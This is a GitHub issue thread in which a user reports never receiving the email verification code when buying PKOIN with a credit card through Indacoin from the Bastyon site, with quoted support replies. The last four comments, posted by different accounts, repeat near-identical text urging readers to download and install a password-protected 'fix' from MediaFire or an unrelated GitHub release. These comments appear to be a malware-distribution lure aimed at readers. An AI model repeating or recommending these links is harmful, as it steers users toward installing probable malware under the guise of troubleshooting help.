### ISSUE TITLE
Using credit card, PKOIN buyer never received code

### ISSUE THREAD

**Issue by Francewhoa** [pocketnetteam/documentation#4]
## Challenge

Hi there Bastyon and Indacoin enthousiats :)

I'm trying to buy PKOIN using the link on the Bastyon website. But it always failed. As I never received the email with the validation code.

I'm new to Bastyon, I searched the GitHub repositories owned by pocketnetteam but found none about the website at https://bastyon.com So feel free to move this ticket/issue to another repository

## Steps to reproduce

1. Go to https://bastyon.com/index

2. Click on the PKOIN balance link. Which is located at the top right side of this page. This link goes to` https://bastyon.com/userpage?id=wallet`

3. On this page, click on the "Buy with credit card" button. This link goes to` https://buy.pkoin.indacoin.io/index?address=<MASKED WALLET ID>`

4. Fill the form

5. At steps 2, it reads "Verify your contact information" "We have sent the code to your contact. Please enter this code below."

6. Wait more than 30 minutes or more than 48 hours. No email is received.

7. After 15 minutes. Click the "Get new code" link also failed. As no email is received.

## What I tried that failed

- Check the spam folder
- Firefox 102
- Chromium 106
- Deactivate Proxy/VPN
- Deactivate all browser plug-in
- I tried `<MASKED>@ubertus.org` email address. But this also failed. Same steps to reproduce above.
- I tried `<MASKED>@simplelogin.fr` email address. But this also failed. Same steps to reproduce above.
- I tried `<MASKED>@gmail.com` email address. I really do NOT like Gmail. Because they have a very long history of weak privacy, weak security, and censoring people how have lawful feelings or thought different than theirs. I used Gmail just for testing this.

### Clouflare blocks emails

Maybe somehow cloudfare blocks some email

I noticed that Indacoin uses both Gmail and Cloudflare. Indacoin are really welcome to choose any suppliers to their liking. The risk with Gmail and Cloudflare is that they have a very long history of weak privacy, weak security, censorship, and blocking their user's accounts. For example, but not limited to, they increasingly censor and block people who have lawful feelings Gmail or Cloudflare disagree with. Are they afraid of personal growth? Afraid of diversity of feelings or thoughts?

To resolve this challenge, our favourite email suppliers are https://mailbox.org and https://posteo.de We tried email addresses hosted with both. In both cases, buying with Indacoin failed.

Indacoin clients, such as PKOIN and Bastyon.com are interested in strong privacy. By choosing email and cloud suppliers who protect privacy, Indacoin's services would be much more attractive. In turn, increase their income.

Cheers,

Francewhoa

**Comment by Francewhoa** [comment]
Reply from Indacoin

> Indacoin Support
> Fri, 10/07/22 3:28 pm 	
>  
> Hello! Thank you for the update. We forwarded information to our team and will get back to you as soon as there is an update from them.

**Comment by Francewhoa** [comment]
Reply from Indacoin. We received those two conflicting replies from Indacoin. I'm assuming a good faith typo or miscommunication.

> Subject: 	Re: Ticket #`<MASKED>`
> Date: 	Mon, 10 Oct 2022 15:05:13 +0000
> From: 	Indacoin Support `<MASKED>`
> Reply-To: 	Indacoin Support `<MASKED>`
> To: 	`<MASKED>`
> Message ID: <7363ba68-d5cc-416b-80c9-fd34d79a0817@mtasv.net>
>
> Hello! Our developers investigated and fixed the problem. Please try again and feel free to contact us if you have any other questions! 

-----------------

**Comment by andyoknen** [comment]
We also observe problems on the part of IndaCoin and stay in touch with them to solve the problem.

**Comment by andyoknen** [comment]
https://github.com/pocketnetteam/pocketnet.core/issues/431

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
